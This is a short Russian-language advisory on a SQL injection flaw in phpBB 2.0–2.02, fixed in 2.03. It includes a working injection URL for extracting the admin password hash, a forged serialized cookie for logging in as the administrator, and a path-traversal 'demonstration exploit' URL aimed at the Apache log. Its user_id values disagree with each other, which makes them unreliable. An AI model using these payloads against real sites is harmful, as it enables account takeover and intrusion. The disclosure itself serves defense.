В phpBB обнаружена возможность изменения SQL запроса. Удаленный пользователь может получить хеш пароля администратора и, используя его, получить полный контроль над PHPbb системой.
Уязвимость обнаружена в сценарии page_header.php. Например, чтобы взломать user_id '40', запросите следующую страницу:
http://site/phpBB/index.php?forum_id=1+or+user_id=40+and+mid
(user_password,1,1)=char(97)/*
В результате запрос будет выглядеть следующим образом:
SELECT u.username, u.user_id, u.user_allow_viewonline, u.user_level,
s.session_logged_in, s.session_ip FROM phpbb_users u, phpbb_sessions s WHERE
u.user_id = s.session_user_id AND s.session_time >= 1035778374 AND s.session_page =
1 or user_id=40 and mid(user_password,1,1)=char(97)/* ORDER BY u.username ASC,
s.session_ip ASC
Имя администратора системы можно просмотреть вверху списка пользователей внизу страницы форума. Далее добавляя хеш пароля в куки, можно войти на сайт как администратор системы. Например, если user_id равен 32360, и хеш пароля — 6a204bd89f3c8348afd5c77c717a097a, то атакующий должен добавить следующее значение:
a:2:
{s:11:"autologinid";s:32:"6a204bd89f3c8348afd5c77c717a097a";s:6:"userid";s:
5:"31360";} www.phpbb.com/ 1536 1063947136 29596959 197425936 29523534 *
Затем urlencode() это и поместите в куки с переменной 'phpbb2support_data', затем обратитесь к административной странице на phpbb сайте. Демонстрационный эксплоит:
http://[target]/phpBB/prefs.php?HTTP_POST_VARS[save]
=1&passwd=asdfasdf&viewemail=0&savecookie=0&sig=0&smile=0&dishtml=0&disbbco
de=0&themes =1〈=/../../../var/logs/apache/access.log%00
&save=1&user=admin&submit=Save%20Preferences
Уязвимость обнаружена в phpBB 2.0,2.01, 2.02 и устранена в 2.03
